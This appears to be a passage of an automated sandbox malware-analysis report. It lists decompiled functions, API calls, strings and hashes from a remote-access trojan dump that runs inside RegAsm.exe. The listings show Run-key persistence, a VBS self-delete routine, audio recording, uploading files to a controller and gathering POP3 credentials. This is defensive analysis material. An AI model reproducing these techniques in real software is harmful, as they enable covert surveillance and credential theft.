                            • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,636A1986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                          • ExitProcess.KERNEL32 ref: 0040D454
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                          • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`.|$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF
                          • API String ID: 3797177996-3206307217
                          • Opcode ID: 9f8aff639c038808ac3b2befcd98474336a74f9fecab3a97dc503a806b773c90
                          • Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
                          • Opcode Fuzzy Hash: 9f8aff639c038808ac3b2befcd98474336a74f9fecab3a97dc503a806b773c90
                          • Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
                          Function 004124B0 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 190synchronizationsleepfileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004124CF
                          • ExitProcess.KERNEL32(00000000), ref: 004124DB
                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                          • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                          • CloseHandle.KERNEL32(00000000), ref: 00412576
                          • GetCurrentProcessId.KERNEL32 ref: 0041257C
                          • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                          • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                          • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                          • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                            • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                          • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                          • Sleep.KERNEL32(000001F4), ref: 004126BD
                          • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                          • CloseHandle.KERNEL32(00000000), ref: 004126E4
                          • GetCurrentProcessId.KERNEL32 ref: 004126EA
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                          • String ID: .exe$8SG$WDH$exepath$open$temp_
                          • API String ID: 2649220323-436679193
                          • Opcode ID: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
                          • Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
                          • Opcode Fuzzy Hash: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
                          • Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
                          Function 0041B0D8 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                          • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                          • PathFileExistsW.SHLWAPI(00000000), ref: 0041B21F
                          • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                          • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                          • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                          • SetEvent.KERNEL32 ref: 0041B2AA
                          • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                          • CloseHandle.KERNEL32 ref: 0041B2CB
                          • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                          • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                          • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                          • API String ID: 738084811-2094122233
                          • Opcode ID: d2db031e3b1df8eedd793174f912beb473d8d97f533f0dd4154628810b81d940
                          • Instruction ID: 904a2ea9ee052b7cd0d2885f28b370526ea16529c5f4723dacad6ab52bd59ce6
                          • Opcode Fuzzy Hash: d2db031e3b1df8eedd793174f912beb473d8d97f533f0dd4154628810b81d940
                          • Instruction Fuzzy Hash: 015193B12842056ED314B731DC96ABF779CDB80359F10053FB246621E2EF789D498AAE
                          Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                          • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                          • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                          • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                          • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                          • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                          • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                          • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                          • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                          • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Write$Create
                          • String ID: RIFF$WAVE$data$fmt
                          • API String ID: 1602526932-4212202414
                          • Opcode ID: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                          • Instruction ID: e437df56db769974f3bb03b9acf3047b6271bea3308615ff466a61b001f8e6b8
                          • Opcode Fuzzy Hash: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                          • Instruction Fuzzy Hash: D1413F72644218BAE210DB51DD85FBB7FECEB89B50F40441AFA44D60C0E7A5E909DBB3
                          Function 004072AB Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,00407688,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,004076B0,`.|,00407709), ref: 004072BF
                          • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                          • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                          • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                          • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                          • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                          • GetProcAddress.KERNEL32(00000000), ref: 00407308
                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                          • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                          • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                          • GetProcAddress.KERNEL32(00000000), ref: 00407330
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                          • API String ID: 1646373207-255920310
                          • Opcode ID: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                          • Instruction ID: 405170eedd050388d8f538cead316ce70cca9a1d875d15a5a69166cce564cbe9
                          • Opcode Fuzzy Hash: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                          • Instruction Fuzzy Hash: 0A0152A0E4431676D711AF7AAC44D577E9D9E41351311487BB405E2292EEBCE800CD6E
                          Function 0044F4AD Relevance: 30.2, APIs: 16, Strings: 1, Instructions: 419COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$EnvironmentVariable
                          • String ID: X8|
                          • API String ID: 1464849758-3552716790
                          • Opcode ID: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                          • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                          • Opcode Fuzzy Hash: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                          • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                          Function 1000173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: _strlen
                          • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                          • API String ID: 4218353326-3023110444
                          • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                          • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                          • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                          • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                          Function 0040CE34 Relevance: 30.0, APIs: 12, Strings: 5, Instructions: 203fileCOMMON
                          Download Yara Rule
                          APIs
                          • _wcslen.LIBCMT ref: 0040CE42
                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                          • CopyFileW.KERNEL32 ref: 0040CF0B
                          • _wcslen.LIBCMT ref: 0040CF21
                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                          • CopyFileW.KERNEL32 ref: 0040CFBF
                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                          • _wcslen.LIBCMT ref: 0040D001
                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                          • CloseHandle.KERNEL32 ref: 0040D068
                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                          • ExitProcess.KERNEL32 ref: 0040D09D
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                          • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$`.|$del$open
                          • API String ID: 1579085052-1843855153
                          • Opcode ID: e23ef020428c66d53fd8e3c33b5503753ae814959289fe9288ddeebf21de7c0a
                          • Instruction ID: 98553dc1b0994f0aa09194d7cf3a18af63584d9ff732256a229fdfb73b573f5c
                          • Opcode Fuzzy Hash: e23ef020428c66d53fd8e3c33b5503753ae814959289fe9288ddeebf21de7c0a
                          • Instruction Fuzzy Hash: 3151E820208302ABD615B7359C92A6F679D9F8471DF00443FF60AA61E3EF7C9D05866E
                          Function 0041C0AC Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlenW.KERNEL32(?), ref: 0041C0C7
                          • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                          • lstrlenW.KERNEL32(?), ref: 0041C0F8
                          • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                          • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                          • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                          • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                          • _wcslen.LIBCMT ref: 0041C1CC
                          • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                          • GetLastError.KERNEL32 ref: 0041C204
                          • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                          • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                          • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                          • GetLastError.KERNEL32 ref: 0041C261
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                          • String ID: ?
                          • API String ID: 3941738427-1684325040
                          • Opcode ID: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                          • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                          • Opcode Fuzzy Hash: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                          • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                          Function 100019B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: _strlen
                          • String ID: %m$~$Gon~$~F@7$~dra
                          • API String ID: 4218353326-230879103
                          • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                          • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                          • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                          • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                          Function 0041C720 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
                          • RegEnumKeyExA.ADVAPI32 ref: 0041C786
                          • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseEnumOpen
                          • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                          • API String ID: 1332880857-3714951968
                          • Opcode ID: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                          • Instruction ID: 8204223968f620e226549da85b9b34a309c849e8d9bbed411749b7727356edba
                          • Opcode Fuzzy Hash: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                          • Instruction Fuzzy Hash: 3E8133311082459BC325EF11D851EEFB7E8BF94309F10492FB589921A2FF74AE49CA5A
                          Function 0041D620 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                          Download Yara Rule
                          APIs
                          • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                          • GetCursorPos.USER32(?), ref: 0041D67A
                          • SetForegroundWindow.USER32(?), ref: 0041D683
                          • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                          • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                          • ExitProcess.KERNEL32 ref: 0041D6F6
                          • CreatePopupMenu.USER32 ref: 0041D6FC
                          • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                          • String ID: Close
                          • API String ID: 1657328048-3535843008
                          • Opcode ID: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                          • Instruction ID: ffebe08b42ddc2cad69fc5dc181b4667ce265f065f51bc56e4a7814a85689449
                          • Opcode Fuzzy Hash: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                          • Instruction Fuzzy Hash: 2D213BB1544209FFDF155FA4ED0EAAA3F35EB08302F000125F909951B2D779EDA1EB19
                          Function 00445DD7 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$Info
                          • String ID:
                          • API String ID: 2509303402-0
                          • Opcode ID: 265d55c29888f35ec20f5081f159e7cd252a50d65c59893da787bb4e51b2451e
                          • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                          • Opcode Fuzzy Hash: 265d55c29888f35ec20f5081f159e7cd252a50d65c59893da787bb4e51b2451e
                          • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                          Function 00408BB5 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 328fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408D1E
                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                          • __aulldiv.LIBCMT ref: 00408D88
                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                          • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                          • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                          • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                          • CloseHandle.KERNEL32(00000000), ref: 00408FE9
                          • CloseHandle.KERNEL32(00000000), ref: 00409037
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                          • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                          • API String ID: 3086580692-2582957567
                          • Opcode ID: 1eca58239539986b7f47a22af75df51a2b8eece64db44562e943364f676ba915
                          • Instruction ID: 3fce176daff91a8ac67d7e00268aa6ddaa8eb0a69c3dc15cdf5b3728eb075172
                          • Opcode Fuzzy Hash: 1eca58239539986b7f47a22af75df51a2b8eece64db44562e943364f676ba915
                          • Instruction Fuzzy Hash: CCB1A1316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB8B
                          Function 10007CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • ___free_lconv_mon.LIBCMT ref: 10007D06
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                          • _free.LIBCMT ref: 10007CFB
                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                          • _free.LIBCMT ref: 10007D1D
                          • _free.LIBCMT ref: 10007D32
                          • _free.LIBCMT ref: 10007D3D
                          • _free.LIBCMT ref: 10007D5F
                          • _free.LIBCMT ref: 10007D72
                          • _free.LIBCMT ref: 10007D80
                          • _free.LIBCMT ref: 10007D8B
                          • _free.LIBCMT ref: 10007DC3
                          • _free.LIBCMT ref: 10007DCA
                          • _free.LIBCMT ref: 10007DE7
                          • _free.LIBCMT ref: 10007DFF
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                          • String ID:
                          • API String ID: 161543041-0
                          • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                          • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                          • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                          • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                          Function 00451346 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • ___free_lconv_mon.LIBCMT ref: 0045138A
                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
